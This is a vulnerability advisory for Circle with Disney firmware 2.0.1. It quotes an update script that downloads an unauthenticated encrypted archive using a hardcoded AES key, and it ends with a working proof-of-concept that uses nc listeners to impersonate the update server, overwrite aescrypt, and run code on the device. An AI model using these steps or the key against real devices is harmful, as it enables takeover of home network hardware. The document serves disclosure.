Circle with Disney check_circleservers Code Execution Vulnerability

Summary

An exploitable vulnerability exists in the servers update functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause the device to overwrite sensitive files, resulting in code execution. An attacker needs to impersonate a remote server in order to trigger this vulnerability.

Tested Versions

Circle with Disney 2.0.1

Product URLs

<https://meetcircle.com/&gt;

CVSSv3 Score

9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-73: External Control of File Name or Path

Details

Circle with Disney is a network device used to monitor internet use of children on a given network.

A cronjob exists which executes the script “check_circleservers.sh” every 4 hours:

#!/bin/sh
MAC=`cat /tmp/MAC`;
VER=`cat /tmp/circleservers.ver`
CIRCLE_ROOT=`cat /tmp/CIRCLE_ROOT`
rm -f /tmp/circleservers.bin /tmp/circleserver.tgz
/tmp/wget -q -t 1 -T 30  -O /tmp/circleservers.bin "http://download.meetcircle.co/dev/firmware/get_circleservers.php?
DEVID=$MAC&VER=$VER" || exit
if [ -s /tmp/circleservers.bin ]; then
    /tmp/aescrypt -d -p a801e2f7bd4104073a296dc5c63857cf -o /tmp/circleservers.tgz /tmp/circleservers.bin || exit
    [ -s /tmp/circleservers.tgz ] || exit
    cd /tmp/
    tar zxf /tmp/circleservers.tgz
        if [ -s /tmp/circleservers ]; then
            $CIRCLE_ROOT/ipsetload circleservers /tmp/circleservers
                cp -f /tmp/circleservers $CIRCLE_ROOT/scripts/circleservers.list
        fi
fi
rm -f /tmp/circleservers.bin /tmp/circleservers.tgz

The script above downloads an encrypted tar archive using an HTTP request, which gets then decrypted and extracted in the “/tmp” directory. Since the encryption password is known and the http connection is not authenticated, an attacker able to impersonate the remote server could overwrite any file in the “/tmp” directory. Since the script itself executes “/tmp/aescrypt”, one of the ways to exploit this bug is to overwrite “aescrypt” with a custom executable: this allows an attacker to execute arbitrary code on the next call of the script.

Exploit Proof-of-Concept

The following proof of concept shows how to execute the “power_down.sh” script on the device. An attacker needs to impersonate the server “download.meetcircle.co” in order to answer to the HTTP requests.

$ echo "/mnt/shares/usr/bin/scripts/circle/power_down.sh" > aescrypt
$ chmod 777 aescrypt
$ tar czf evil.tgz aescrypt
$ aescrypt -e -p a801e2f7bd4104073a296dc5c63857cf -o evil.bin evil.tgz
$ ( echo -en "HTTP/1.0 200 OK\nContent-Length: $(stat -c%s evil.bin)\n\n"; cat evil.bin ) | sudo nc -vv -l -p 80
$ ( echo -en "HTTP/1.0 200 OK\nContent-Length: 1\n\nX" ) | sudo nc -vv -l -p 80

Timeline

2017-08-02 - Vendor Disclosure
2017-10-31 - Public Release